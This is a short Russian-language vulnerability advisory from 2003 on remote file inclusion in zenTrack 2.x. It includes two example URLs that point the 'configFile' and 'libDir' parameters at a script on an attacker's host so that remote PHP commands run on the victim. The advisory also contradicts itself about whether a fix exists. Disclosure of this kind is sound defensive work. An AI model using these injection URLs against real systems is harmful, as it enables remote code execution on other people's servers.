| Дата публикации: | 11.06.2003 |
| Всего просмотров: | 15855 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | zenTrack 2.x |
| Описание: | Уязвимость обнаружена в zenTrack. Удаленный пользователь может выполнить произвольные команды на системе.
Удаленный пользователь может определить удаленное местоположение сценария 'header.php' в переменной '$configFile', чтобы выполнить произвольный PHP код на системе. Пример:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?cmd=pwdУдаленный пользователь может также определить удаленное местоположение сценария 'translator.class' файла в '/test' каталоге на удаленном сервере в libDir переменной, чтобы выполнить произвольный PHP код на системе. Пример: http://[victim]/zentrack/www/index.php?libDir=http://[attacker]/test/&cmd=p wdУязвимость обнаружена в zenTrack 2.4.1 Способов устранения обнаруженной уязвимости не существует в настоящее время. |
| Ссылки: | zenTrack Remote Command Execution Vulnerabilities |